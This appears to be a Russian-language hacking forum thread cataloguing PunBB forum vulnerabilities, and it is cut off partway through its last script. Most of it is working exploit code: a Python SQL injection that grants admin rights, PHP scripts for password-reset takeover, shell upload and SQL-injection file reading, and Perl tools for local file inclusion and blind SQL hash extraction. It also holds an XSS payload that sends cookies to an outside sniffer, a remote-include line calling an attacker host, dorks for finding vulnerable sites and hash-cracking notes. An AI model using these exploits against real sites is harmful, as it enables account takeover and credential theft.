PunBB <= 1.2.14 Remote Code Execution Exploit PunBB version <= 1.2.2 Authentication Bypass Exploit ShAnKaR: multiple PHP application poison NULL byte vulnerability PunBB 1.2.4 (change_email) SQL Injection Exploit 1.2.11 PHP: index.php&req_subject=test&req_message=test"><script>alert(1);</script> <= 1.2.16(moderate.php) PHP: preg_match('/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}/', $_GET['get_host'])) moderate.php?get_host=1.1.1.1<script>alert(1)</script> <= 1.2.16 PHP: moderate.php?get_host=1.1.1.1<script>alert(1)</script> <= 1.2.15 (message_popup.php) XSS code vulnerability PHP: <?php echo $lang_pms['Popup new'], $return['sender'], $lang_pms['Popup subj'], $return['subject'] ?><br><?php echo $lang_pms['Popup send'], format_time($return['posted']) ?> <= 1.2.13 SQL Injection PHP: search.php?action=search&keywords=hello&author=&forum=-1&search_in=all&sort_by=0&sort_dir=DESC&show_as=topics&search=1&result_list[< UNION SQL QUERY >/*]&1763905137=1&1121320991=1 dork: warning: ini_get has been Remote File Inclusion in forum PunBB 1.1.2 >> 1.1.5 PHP: include/common.php?pun_root=http://www.host_evil.com/cmd?&=id PunBB <= 1.2.4 - change email to become admin exploit Code: #!/usr/bin/python ################################################## ##################### # _ _ _ _ ___ _ _ ___ # | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \ # | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/ # |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_| # ################################################## ##################### # Proof of concept code from the Hardened-PHP Project ################################################## ##################### # # -= PunBB 1.2.4 =- # change_email SQL injection exploit # # user-supplied data within the database is still user-supplied data # ################################################## ##################### import urllib import getopt import sys import string __argv__ = sys.argv def banner(): print "PunBB 1.2.4 - change_email SQL injection exploit" print "Copyright (C) 2005 Hardened-PHP Project\n" def usage(): banner() print "Usage:\n" print " $ ./punbb_change_email.py [options]\n" print " -h http_url url of the punBB forum to exploit" print " f.e. http://www.forum.net/punBB/" print " -u username punBB forum useraccount" print " -p password punBB forum userpassword" print " -e email email address where the admin leve activation email is sent" print " -d domain catch all domain to catch \"some-SQL-Query\"@domain emails" print "" sys.exit(-1) def main(): try: opts, args = getopt.getopt(sys.argv[1:], "h:u:p:e:d:") except getopt.GetoptError: usage() if len(__argv__) < 10: usage() username = None password = None email = None domain = None host = None for o, arg in opts: if o == "-h": host = arg if o == "-u": username = arg if o == "-p": password = arg if o == "-e": email = arg if o == "-d": domain = arg # Printout banner banner() # Check if everything we need is there if host == None: print "[-] need a host to connect to" sys.exit(-1) if username == None: print "[-] username needed to continue" sys.exit(-1) if password == None: print "[-] password needed to continue" sys.exit(-1) if email == None: print "[-] email address needed to continue" sys.exit(-1) if domain == None: print "[-] catch all domain needed to continue" sys.exit(-1) # Retrive cookie params = { 'req_username' : username, 'req_password' : password, 'form_sent' : 1 } wclient = urllib.URLopener() print "[+] Connecting to retrieve cookie" req = wclient.open(host + "/login.php?action=in", urllib.urlencode(params)) info = req.info() if 'set-cookie' not in info: print "[-] Unable to retrieve cookie... something is wrong" sys.exit(-3) cookie = info['set-cookie'] cookie = cookie[:string.find(cookie, ';')] print "[+] Cookie found - extracting user_id" user_id = cookie[string.find(cookie, "%3A%22")+6:string.find(cookie, "%22%3B")] print "[+] User-ID: %d" % (int(user_id)) wclient.addheader('Cookie', cookie); email = '"' + email[:string.find(email, '@')] + '"@' + email[string.find(email, '@')+1:] + ',"\',' append = 'group_id=\'1' email = email + ( ((50-len(append))-len(email)) * ' ' ) + append + '"@' + domain params = { 'req_new_email' : email, 'form_sent' : 1 } print "[+] Connecting to request change email" req = wclient.open(host + "profile.php?action=change_email&id=" + user_id, urllib.urlencode(params)) print "[+] Done... Now wait for the email. Log into punBB, go to the link in the email and become admin" if __name__ == "__main__": main() PunBB BBCode URL Tag Script Injection Vulnerability PHP: [color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(th is.sss));'sss=`i=new/**/Image();i.src='http://baba/sniffer.php?c='+document.cookie;this.sss=null`styl e='font-size:0;][/url][/url]'[/color] -punbb_users --id --group_id --username --password Dork example: intext:"Powered by PunBB 1.2.5" intext:"Powered by PunBB" -"1.2.6" -"1.2.7" intext:"Powered by PunBB 1.1.0...7" OR "Powered by PunBB 1.2.0...7" intext:"Powered by PunBB" -"1.2.6" -"1.2.7" inurl:index.php -blog -inurl:"page=info" -inurl:"page=all" -inurl:"showtopic" intext:"Powered by PunBB" -"1.2.6" -"1.2.7" inurl:index.php -blog
Криптографическая атака Алгоритм шифрования в куках: PHP: md5($cookie_seed.md5(password)) Пример: md5($cookie_seed.md5("123"))="beae53ed5f767f344b03646a1aa5b16e" В состав строгого значения входят символы из ряда "abcdef1234567890". Схема генерации куков: PHP: md5($cookie_seed.$pun_user['password']) $pun_user['password'] - sha1() или md5() хеш пароль пользователя. $cookie_seed - соль ("идентична" для всех пользователей). Дефолтное значение алгоритма для $cookie_seed(config.php): PHP: function pun_hash($str) { if (function_exists('sha1')) // Only in PHP 4.3.0+ return sha1($str); else if (function_exists('mhash')) // Only if Mhash library is loaded return bin2hex(mhash(MHASH_SHA1, $str)); else return md5($str); } PasswordPro не обладает алгоритмом перебора md5(salt.md5(pass)) поэтому будем использовать метод "перебор по маске": "Набор символов" для пользовательской маски: ?1: abcdef1234567890 Маска: ?1?1?1?1?1?1?1?1202cb962ac59075b964b07152d234b70 Значение длины: 40-40 === UPDATE: PasswordPro теперь имеет соответствующий модуль
PunBB <= 1.2.16 Blind Password Recovery Exploit PunBB <= 1.2.16 Blind Password Recovery Exploit http://www.milw0rm.com/exploits/5165 Code: <?php /** * Original : http://sektioneins.de/advisories/SE-2008-01.txt * Thanks to Stefan Esser, here's the exploit. * * Team : EpiBite * firefox, petit-poney, thot * Nous tenons a remercier nos mamans et papas respectifs. * Let's get a fu*** coffee ! */ // conf define('URL', 'http://localhost/punbb_1-2-16_fr/upload'); // base url define('EMAIL', '[email protected]'); // your email define('LOGIN', 'login_x'); // your login define('PASS', '620553.8I73'); // your pass // Exploit printf("--\nUrl : %s\nEmail : %s\n--\n", URL, EMAIL); $h = curl_init(); curl_setopt($h, CURLOPT_URL, URL.'/userlist.php?username=&show_group=-1&sort_by=registered&sort_dir=ASC&search=Envoyer'); curl_setopt($h, CURLOPT_RETURNTRANSFER, 1); $s = curl_exec($h); preg_match('/profile\.php\?id=([0-9]*)">([^<]*)</', $s, $m); define('ADMIN', $m[2]); preg_match('/<td class="tcr">([0-9]{4})-([0-9]{2})-([0-9]{2})<\/td/', $s, $m); if (count($m)) define('DATE', mktime(0, 0, 0, $m[2], $m[3], $m[1])); else define('DATE', time() - 86400); //just in case, the forum or account just has been created printf("Admin : %s\nDate : %s\n--\n", ADMIN, DATE); $h = curl_init(); curl_setopt($h, CURLOPT_URL, URL.'/login.php?action=forget_2'); // curl_setopt($h, CURLOPT_PROXY, 'proxies.epitech.net:3128'); curl_setopt($h, CURLOPT_RETURNTRANSFER, 1); curl_setopt($h, CURLOPT_HEADER, 1); curl_setopt($h, CURLOPT_POST, 1); curl_setopt($h, CURLOPT_POSTFIELDS, implode('&', array('form_sent=1', 'req_email='.urlencode(EMAIL), 'request_pass=Envoyer'))); preg_match('/mailto:([^"]*)"/', curl_exec($h), $m); define('ADMIN_MAIL', $m[1]); // Admin email (normally automatically get, set manually if there's problem) printf("Admin mail : %s\n--\n", ADMIN_MAIL); $h = curl_init(); curl_setopt($h, CURLOPT_URL, URL.'/login.php?action=forget_2'); curl_setopt($h, CURLOPT_RETURNTRANSFER, 1); // curl_setopt($h, CURLOPT_PROXY, 'proxies.epitech.net:3128'); curl_setopt($h, CURLOPT_COOKIE, 'punbb_cookie='.rawurlencode(serialize(array(0 => 2, 1 => md5('bite'))))); curl_setopt($h, CURLOPT_HEADER, 1); curl_setopt($h, CURLOPT_POST, 1); curl_setopt($h, CURLOPT_POSTFIELDS, implode('&', array('form_sent=1', 'req_email='.urlencode(ADMIN_MAIL), 'request_pass=Envoyer'))); $s = curl_exec($h); preg_match('/Set-Cookie:.*punbb_cookie=([^;]*)\;/', $s, $m); $c = unserialize(urldecode($m[1])); define('MD5_NOT_LOGGUED', $c[1]); printf("Md5 not loggued : %s\n--\n", MD5_NOT_LOGGUED); $h = curl_init(); curl_setopt($h, CURLOPT_URL, URL.'/login.php?action=in'); curl_setopt($h, CURLOPT_RETURNTRANSFER, 1); curl_setopt($h, CURLOPT_HEADER, 1); // curl_setopt($h, CURLOPT_PROXY, 'proxies.epitech.net:3128'); curl_setopt($h, CURLOPT_POST, 1); curl_setopt($h, CURLOPT_POSTFIELDS, implode('&', array('form_sent=1', 'redirect_url=index.php', 'req_username='.LOGIN, 'req_password='.PASS))); $s = curl_exec($h); preg_match('/Set-Cookie:.*punbb_cookie=([^;]*)\;/', $s, $m); $c = unserialize(urldecode($m[1])); define('MD5_LOGGUED', $c[1]); printf("Md5 loggued : %s\n--\n", MD5_LOGGUED); define('PASS_MD5ED', sha1(PASS)); $chars = array('/', '-', "\\", '|'); for ($p = 0; $p < 86400 * 2; $p++) { if (!($p % 300)) echo $chars[($p / 300) % 4]."\r"; if (strcmp(MD5_LOGGUED, md5(substr(md5((int)(DATE + $p)), -8).PASS_MD5ED)) == 0) { define('SEED', substr(md5(DATE + $p), -8)); break; } } printf("Seed : %s\n--\n", SEED); for ($p = 0; $p < 1000000; $p++) { if (!($p % 300)) echo $chars[($p / 300) % 4]."\r"; mt_srand((double)$p); if (strcmp(md5(SEED.random_pass(8)), MD5_NOT_LOGGUED) == 0) { define('SRAND', $p); break; } } printf("SRAND : %s\n--\n", SRAND); mt_srand(SRAND); random_pass(8); printf("New password : %s\n--\n", random_pass(8)); $url = URL.'/profile.php?id=2&action=change_pass&key='.random_pass(8);// Id is set to '2' (the admin's id, but you can change your target) $h = curl_init(); curl_setopt($h, CURLOPT_URL, $url); curl_setopt($h, CURLOPT_RETURNTRANSFER, 1); curl_exec($h); function random_pass($len) { $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'; $password = ''; for ($i = 0; $i < $len; ++$i) $password .= substr($chars, (mt_rand() % strlen($chars)), 1); return $password; } # milw0rm.com [2008-02-21]
PunBB module Automatic Image Upload with Thumbnails <= 1.3.4 arbitary file upload PHP: <?php # PunBB module Automatic Image Upload with Thumbnails <= 1.3.4 arbitary file upload # h3ck.[rv.ua], 2008 $host = 'localhost'; # хост $path = '/punbb/'; # путь к форуму $file_type = 'image/gif'; $file_name = 'sh1.gif.php'; # название нового файла $file_code = '<?php phpinfo(); ?>'; # код, который будем выполнять $cookie = 'punbb_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A1%3A%222%22%3Bi%3A1%3Bs%3A32%3A%220b9ca83006024ac122e2b1c459c0804f%22%3B%7D'; # без авторизации не будет работать.. $file_content = base64_decode('R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw=='); $post_data = <<<POST ------------9cYrkcaQ3YTUyzCSnL8xD2 Content-Disposition: form-data; name="form_sent" 1 ------------9cYrkcaQ3YTUyzCSnL8xD2 Content-Disposition: form-data; name="imagefile"; filename="$file_name" Content-Type: $file_type ${file_content}${file_code} ------------9cYrkcaQ3YTUyzCSnL8xD2 Content-Disposition: form-data; name="uploadimg" Submit ------------9cYrkcaQ3YTUyzCSnL8xD2-- POST; $post_len = strlen($post_data); $req = <<<REQ POST http://${host}${path}uploadimg.php?subpage=upload HTTP/1.0 User-Agent: Opera/9.27 (Windows NT 5.1; U; ru) Host: $host Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: uk-UA,uk;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Cookie: $cookie Content-Length: $post_len Content-Type: multipart/form-data; boundary=----------9cYrkcaQ3YTUyzCSnL8xD2 Connection: Close $post_data REQ; $fp = fsockopen($host, 80, $errno, $errstr, 30); if (!$fp) { echo "$errstr ($errno)<br />\n"; } else { echo "Sending... <pre>$req</pre>\n"; fwrite($fp, $req); while (!feof($fp)) { echo fgets($fp); } fclose($fp); } ?>
PunBB Migration Tool 1.4.0 PunBB Migration Tool 1.4.0 Download URL: Code: http://punbb.er.cz/czmirror/PunBB_Migration_Tool-1.4.0.tar Bug Type:Local File Inclusion Bug In: Code: [I]converters/index.php[/I] Vulnerable Code: Code: <?php // Load a specific page else{ if(file_exists($_GET['page'] . '.php')) include $_GET['page'] . '.php'; else include 'settings.php'; ?> Proof Of Concept:http://www.website.com/[path]/converters/index.php?page=/etc/passwd%00
PunBB 1.2.17 Sql injection & File reader Code: v1.2.17 punbb.ru rev87 /message_popup.php message_popup.php?id=0+UNION+SELECT+user_id,concat_ws(0x3a,table_name),2,3+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+номер таблицы,1 узнаем префикс по таблицам. -----------------------------------SQL< /message_popup.php?id=0+union+select+user_id,username,3,password+from+[PREFIX]users+where+id=2 Узнаем имя и хеш админа. -----------------------------------SQL< download.php /download.php?aid=9+union+select+1,file,3,user_id,null,1 просматриваем файлы на хосте -----------------------------------SQL< user_id - Ваш id на форуме через который вы зашли By @Fatal@ aka Doom123 PHP: <?php /** * @author @Fatal@ * @copyright HWT©2008 * * PunBB expl0it * * Уязвимость существует по причине недостатачной обработки * входящх данных в файле download.php! * * Овтор не несёт ответствености за использоваение данного скрипта! * Используйте его на свой страх и риск! * * Уязвимость нашёл @Fatal@. */ if (isset($_POST['start'])) { if (!empty($_POST['login']) && !empty($_POST['pass']) && !empty($_POST['host']) && !empty($_POST['id']) && !empty($_POST['path'])) { define("_HOST", $_POST['host']); define("_PORT", 80); function cookie($ans) { $head = 'Cookie:'; foreach ($ans as $val) { if (preg_match('#Set-Cookie:(.+)#is', $val, $pock)) { $co = explode(';', $pock['1']); $head .= ' ' . trim($co[0]) . ';'; } } return $head . " \r\n"; } function Prepare_POST_array($arr) { $out = ''; foreach ($arr as $key => $line) { if ($out == '') $out .= $key . '=' . urlencode($line); else $out .= '&' . $key . '=' . urlencode($line); } return $out . "\r\n\r\n"; } function post_query($path, $param, $cook = '', $AnswerFlag = true) { $out = "POST " . $path . " HTTP/1.1\r\n"; if ($param == array()) { $out = "GET " . $path . " HTTP/1.1\r\n"; $data = ""; } else $data = Prepare_POST_array($param); $fp = fsockopen(_HOST, _PORT, $errno, $errstr, 30); if (!$fp) return false; $out .= "Host: " . _HOST . "\r\n"; $out .= "Content-Type: application/x-www-form-urlencoded; charset=windows-1251\r\n"; $out .= "Content-Length: " . strlen($data) . "\r\n"; $out .= "User-Agent: Opera/9.27 (Windows NT 5.1; U; ru)\r\n"; $out .= $cook; $out .= "Connection: Close\r\n\r\n"; $out .= $data; fwrite($fp, $out); if ($AnswerFlag) { while (!feof($fp)) { $answer[] = fgets($fp, 1024); } } else $answer = true; fclose($fp); return $answer; } $array = array( 'form_sent' => '1', 'redirect_url' => 'index.php', 'req_username' => $_POST['login'], 'req_password' => $_POST['pass'], ); $ans = post_query($_POST['path'].'login.php?action=in', $array); $a = cookie($ans); if($_POST['method'] != 2) { if (!empty($_POST['nid'])) { if(empty($a)) $error = 'Не верно введены логин или пароль'; else { $page = $_POST['path'].'download.php?aid=9999+UNION+SELECT+1,password,3,'.$_POST['id'].',null,6+FROM+users+WHERE+id+like+'.$_POST['nid']; $ans2 = post_query($page, array(), $a); $str = implode('',$ans2); if(strrpos($str, "doesn't exist (Errno: 1146)") !== false) { preg_match("# Table '(.+?)\.users' doesn't exist \(Errno: 1146\)#is",$str,$pock); $hex = '0x'.bin2hex($pock[1]); $page = $_POST['path'].'download.php?aid=9999+UNION+SELECT+1,table_name,3,'.$_POST['id'].',null,6+FROM+information_schema.columns+WHERE+table_schema+like+'.$hex; $ans3 = post_query($page, array(), $a); $str = implode('',$ans3); preg_match('#PunBB reported</strong>: (.+?)attachments - this file does not exist#is',$str,$pock); $pref = isset($pock[1]) ? $pock[1] : $_POST['prefix']; $page = $_POST['path'].'download.php?aid=9999+UNION+SELECT+1,password,3,'.$_POST['id'].',null,6+FROM+'.$pref.'users+WHERE+id+like+'.$_POST['nid']; $ans2 = post_query($page, array(), $a); $str = implode('',$ans2); } preg_match('#PunBB reported</strong>: (.{0,40}) - this file does not exist#is',$str,$pock); echo "<center><b><h1>Хеш пользователя:".$pock[1]."</h1></b></center>"; } } else $error = "Введите все данные"; } else { if (!empty($_POST['file'])) { if(empty($a)) $error = 'Не верно введены логин или пароль'; else { $page = $_POST['path'].'download.php?aid=9999+UNION+SELECT+1,"'.$_POST['file'].'",3,'.$_POST['id'].',null,6'; $ans2 = post_query($page, array(), $a); $i = 11; while(array_key_exists($i,$ans2)) { echo htmlspecialchars($ans2[$i]).'<br>'; $i++; } } } else $error = "ВВедите все данные"; } } else $error = "ВВедите все данные"; } if(isset($error) || !isset($_POST['start'])) { echo '<center>'.$error."<BR><BR><b>PunBB Expl0it</b><br><br>"; echo '<form method="post">'; echo 'Хост: <input type="text" name="host"><br>'; echo 'Путь: <input type="text" name="path"><br>'; echo 'Префикс: <input type="text" name="prefix"><br>'; echo 'Логин: <input type="text" name="login"><br>'; echo 'Пароль: <input type="text" name="pass"><br>'; echo 'В.id: <input type="text" name="id"><br>'; echo 'Н.id: <input type="text" name="nid"><br>'; echo 'Файл: <input type="text" name="file"><br>'; echo 'Метод: <select name=method><option value=1>Извлечь хэш</option>'; echo '<option value=2>Просмотреть файл</option></select><br>'; echo '<input type="submit" name="start"></form>'; echo '<br><br>В.id - id вашего пользоваетля'; echo '<br>Н.id - id жертвы(Нжно заполнять при первом методе)'; echo '<br>Файл - Путь до файла (При втором методе)'; echo '<br>Путь - Папка форума например /path/ (Если форум не находатся в папке вводим /)'; echo '<br>Префикс - Обычно определяется сам но если не хватает доступа подставляется ваш'; echo '<br><BR><BR>C0ded by @Fatal@ For HW Team</center>'; } ?>
XSS PunBB 1.3RC XSS в самой последней версии 1.3RC Code: http://punbb/1.3/style/Oxygen/Oxygen.php?base_url=Oxygen.css" onload=alert()> <!---&forum_user[style]=1
Multy vuln PunBB <= 1.2.19 PunBB версии до 1.2.19 Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение и обойти некоторые ограничения безопасности. 1. Уязвимость существует из-за недостаточной обработки входных данных в сценарии include/parser.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. 2. Уязвимость существует из-за неизвестной ошибки, которая позволяет удаленному пользователю внедрить произвольные SMTP команды.
видео видео: XSS в PunBB 1.x Дефейс сайта через уязвимость в PunBB (php include) Новая уязвимость PunBB
PunBB (Private Messaging System 1.2.x) Multiple LFI Exploit http://www.milw0rm.com/exploits/7159 PHP: <?php error_reporting(0); ini_set("default_socket_timeout",5); /* PunBB (Private Messaging System 1.2.x) Multiple LFI Exploit ----------------------------------------------------------- by athos - staker[at]hotmail[dot]it download mod http://www.punres.org/files.php?pid=52 download cms http://punbb.org ----------------------------------------------------------- register_globals = 1 magic_quotes_gpc = 1 Directory (files/include/pms) functions_navlinks.php?pun_user[language]=../../../../../etc/passwd profile_send.php?pun_user[language]=../../../../../etc/passwd viewtopic_PM-link.php?pun_user[language]=../../../../../etc/passwd ../../etc/passwd and nullbyte File (files/include/pms/functions_navlinks.php) 1. <?php 2. require PUN_ROOT.'lang/'.$pun_user['language'].'/pms.php'; $pun_user['language'] isn't declared :D you can include any file functions_navlinks.php?pun_user[language]=../../../etc/passwd%00 ------------------------------------------------------------------- File (files/include/pms/header_new_messages.php) 1. <?php 2. if(!$pun_user['is_guest'] && $pun_user['g_pm'] == 1 && $pun_config['o_pms_enabled'] ){ 3. require PUN_ROOT.'lang/'.$pun_user['language'].'/pms.php'; $pun_user['g_pm'] isn't declared $pun_config['o_pms_enabled'] isn't declared header_new_messages.php?pun_user[g_pm]=1&pun_config[o_pms_enabled]=x&pun_user[language]=../etc/passd%00 ------------------------------------------------------------------- File (files/include/pms/profile_send.php)) 1. <?php 2. require PUN_ROOT.'lang/'.$pun_user['language'].'/pms.php'; $pun_user['language'] isn't declared profile_send.php?pun_user[language]=../../../../etc/passwd%00 ------------------------------------------------------------------- File (files/include/pms/viewtopic_PM-link.php) 1. <?php 2. require PUN_ROOT.'lang/'.$pun_user['language'].'/pms.php'; $pun_user['language'] isn't declared viewtopic_PM-link.php?pun_user[language]=../../../../etc/passwd%00 ------------------------------------------------------------------- Usage: php [punbb.php] [host/path] [mode] php [punbb.php] [host/path] [save] php [punbb.php] [host/path] [NULL] Example: php punbb.php localhost/punbb save php punbb.php localhost/punbb NOTE: Don't add me on MSN Messenger */ $exploit = new Exploit; $domain = $argv[1]; $mymode = $argv[2]; $exploit->starting(); $exploit->is_vulnerable($domain); $exploit->exploiting($domain,$mymode); class Exploit { function http_request($host,$data) { if(!$socket = socket_create(AF_INET,SOCK_STREAM,SOL_TCP)) { echo "socket_create() error!\r\n"; exit; } if(!socket_set_option($socket,SOL_SOCKET,SO_BROADCAST,1)) { echo "socket_set_option() error!\r\n"; exit; } if(!socket_connect($socket,$host,80)) { echo "socket_connect() error!\r\n"; exit; } if(!socket_write($socket,$data,strlen($data))) { echo "socket_write() errror!\r\n"; exit; } while($get = socket_read($socket,1024,PHP_NORMAL_READ)) { $content .= $get; } socket_close($socket); $array = array( 'HTTP/1.1 404 Not Found', 'HTTP/1.1 300 Multiple Choices', 'HTTP/1.1 301 Moved Permanently', 'HTTP/1.1 302 Found', 'HTTP/1.1 304 Not Modified', 'HTTP/1.1 400 Bad Request', 'HTTP/1.1 401 Unauthorized', 'HTTP/1.1 402 Payment Required', 'HTTP/1.1 403 Forbidden', 'HTTP/1.1 405 Method Not Allowed', 'HTTP/1.1 406 Not Acceptable', 'HTTP/1.1 407 Proxy Authentication Required', 'HTTP/1.1 408 Request Timeout', 'HTTP/1.1 409 Conflict', 'HTTP/1.1 410 Gone', 'HTTP/1.1 411 Length Required', 'HTTP/1.1 412 Precondition Failed', 'HTTP/1.1 413 Request Entity Too Large', 'HTTP/1.1 414 Request-URI Too Long', 'HTTP/1.1 415 Unsupported Media Type', 'HTTP/1.1 416 Request Range Not Satisfiable', 'HTTP/1.1 417 Expectation Failed', 'HTTP/1.1 Retry With', ); for($i=0;$i<=count($array);$i++) if(eregi($array[$i],$content)) { return ("$array[$i]\r\n"); break; } else { return ("$content\r\n"); break; } } function is_vulnerable($host) { $host = explode('/',$host); $header .= "GET /$host[1]/profile_send.php?pun_user[language]=%27 HTTP/1.1\r\n"; $header .= "Host: $host[0]\r\n"; $header .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n"; $header .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"; $header .= "Accept-Language: en-us,en;q=0.5\r\n"; $header .= "Accept-Encoding: gzip,deflate\r\n"; $header .= "Connection: close\r\n\r\n"; if(stristr($this->http_request($host[0],$header),"\\'")) { echo "[+] Magic Quotes GPC/Register Globals On!\n"; echo "[+] Exploit Failed!\n"; exit; } else { return false; } } function starting() { global $argv; if(preg_match('/http://(.+?)$/',$argv[1]) or empty($argv[1])) { echo "[+] PunBB (Private Messaging System 1.2.x) Multiple LFI Exploit\r\n"; echo "[+] by athos - staker[at]hotmail[dot]it\r\n"; echo " -----------------------------------------------------------\r\n"; echo "[+] Usage: php $argv[0] [host/path] [mode]\r\n"; echo "[+] Usage: php $argv[0] [host/path] [save]\r\n"; echo "[+] Usage: php $argv[0] [host/path] \r\n"; exit; } } function exploiting($host,$mode) { $host = explode('/',$host); $i = 0; echo "[+] Local File (ex: ../../etc/passwd%00)\r\n"; echo "[+] Local File: "; $file = stripslashes(trim(fgets(STDIN))); if(empty($file)) die("you fail"); $array = array ( "functions_navlinks.php?pun_user[language]=$file", "profile_send.php?pun_user[language]=$file", "viewtopic_PM-link.php?pun_user[language]=$file", "header_new_messages.php?pun_user[g_pm]=1&pun_config[o_pms_enabled]=x&pun_user[language]=$file", ); $write .= "GET /$host[1]/files/include/pms/$array[$i] HTTP/1.1\r\n"; $write .= "Host: $host[0]\r\n"; $write .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n"; $write .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"; $write .= "Accept-Language: en-us,en;q=0.5\r\n"; $write .= "Accept-Encoding: gzip,deflate\r\n"; $write .= "Connection: close\r\n\r\n"; if(stristr($this->http_request($host[0],$write),'No such file or directory in')) { $i++; } else { if($mode == "save") { $rand = rand(0,99999); fclose(fwrite(fopen(getcwd().'/'.$rand.'.txt',"a+"),$this->http_request($host[0],$write))); echo "[+] File $rand Saved Successfully!\r\n"; echo "[+] Exploit Terminated!\r\n"; exit; } else { echo $this->http_request($host[0],$write); exit; } } } }
PHP: #!/usr/bin/perl =about PunBB (PunPortal 0.1) Local File Inclusion Exploit -------------------------------------------------- by athos - staker[at]hotmail[dot]it download mod http://www.punres.org/download.php?id=1108 download cms http://punbb.org register globals = 1 magic quotes gcp = 1 File (include/login.php) 1. <?php 2. 3. // Show login if not logged in 4. if($pun_user['is_guest']) 5. { 6. if(!isset($focus_element) || (isset($focus_element) && !in_array('login', $focus_element))) 7. { 8. 9. // Load the language files 10. require PUN_ROOT.'lang/'.$pun_user['language'].'/common.php'; 11. require PUN_ROOT.'lang/'.$pun_user['language'].'/login.php'; $pun_user['is_guest'] isn't declared $pun_user['language'] isn't declared include/user/login.php?pun_user[is_guest]=a&pun_user[language]=../../etc/passwd%00 how to fix?use the latest version (2.0) Usage: perl punbb.pl localhost/cms =cut use strict; use warnings; use IO::Socket; my $html = undef; my $site = $ARGV[0] or &help; my @take = split /\//,$site; my ($host,$path) = @take; if($site =~ /http:\/\/(.+?)/i) { print STDOUT "Invalid URL\n"; exit; } print STDOUT "Local File (ex: ../../etc/passwd)\n"; print STDOUT "Local File: "; chomp(my $file = <STDIN>); if(not defined($file)) { print STDOUT "File Not Defined!\n"; exit; } my $evil = "/include/user/login.php?pun_user[is_guest]=a&pun_user[language]="; my $sock = new IO::Socket::INET( PeerAddr => $host, PeerPort => 80, Proto => 'tcp', Timeout => 6, ) or die $!; my $data = "GET /${path}/${evil}${file}%00 HTTP/1.1\r\n". "Host: $host\r\n". "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n". "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n". "Accept-Language: en-us,en;q=0.5\r\n". "Accept-Encoding: gzip,deflate\r\n". "Connection: close\r\n\r\n"; $sock->send($data); while(<$sock>) { $html .= $_; } if($html =~ /(No such file or directory|HTTP\/1.1 404 Not Found)/i) { print STDOUT "Exploit Failed!\n"; exit; } else { my $name = int(rand(999)).'.txt'; open(FILE,">",$name); print FILE $html; close(FILE); print STDOUT "Exploit Successfully!\n"; print STDOUT "$name saved!\n"; exit; } sub help { print STDOUT "PunBB (PunPortal 0.1) Local File Inclusion Exploit\n". "by athos - staker[at]hotmail[dot]it\n". "Usage: perl $0 [host/path]\n"; exit; } http://www.milw0rm.com/exploits/7168 (с)
PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit Code: #!/usr/bin/perl #[0-Day] PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit #Coded By Dante90, WaRWolFz Crew #Bug Discovered By: Dante90, WaRWolFz Crew use strict; use LWP::UserAgent; use HTTP::Cookies; use HTTP::Request::Common; use Time::HiRes; use IO::Socket; my ($UserName,$PassWord,$ID) = @ARGV; if(@ARGV < 3){ &usage(); exit(); } my $Message = ""; my ($Hash,$Time,$Time_Start,$Time_End,$Response); my($Start,$End); my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102); my $Host = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link my $Method = HTTP::Request->new(POST => $Host); my $Cookies = new HTTP::Cookies; my $HTTP = new LWP::UserAgent( agent => 'Mozilla/5.0', max_redirect => 0, cookie_jar => $Cookies, ) or die $!; my $Referrer = "form_sent=1&pid=10174&poster=Dante90, WaRWolFz Crew&method=1&req_message=http://www.warwolfz.com/&submit=Invia"; my $DefaultTime = request($Referrer); sub Login(){ my $Login = $HTTP->post($Host.'login.php?action=in', [ form_sent => '1', redirect_url => 'forums.php', req_username => $UserName, req_password => $PassWord, login => 'Login', ]) || die $!; if($Login->content =~ /Logged in successfully./i){ return 1; }else{ return 0; } } if (Login() == 1){ $Message = " * Logged in as: ".$UserName; }elsif (Login() == 0){ $Message = " * Login Failed."; refresh($Message, $Host, $DefaultTime, "0", $Hash, $Time, "1"); print " * Exploit Failed *\n"; print " ------------------------------------------------------ \n"; exit; } sub Blind_SQL_Jnjection{ my ($dec,$hex) = @_; return "Dante90, WaRWolFz Crew\" OR ASCII(SUBSTRING((SELECT `password` FROM `users` WHERE `id`=${ID}),${dec},1))=${hex}/*"; } for(my $I=1; $I<=40; $I++){ #N Hash characters for(my $J=0; $J<=15; $J++){ #0 -> F my $Post = $HTTP->post($Host.'reputation.php?',[ form_sent => '1', pid => '2', poster => Blind_SQL_Jnjection($I,$chars[$J]), method => '1', req_message => 'http://www.warwolfz.com/', submit => 'Submit', ]) || die $!; $Time = request($Referrer); refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I); if($Post->content =~ /(The reputation has been successfully changed)/i){ syswrite(STDOUT,chr($chars[$J])); $Hash .= chr($chars[$J]); $Time = request($Referrer); refresh($Message, 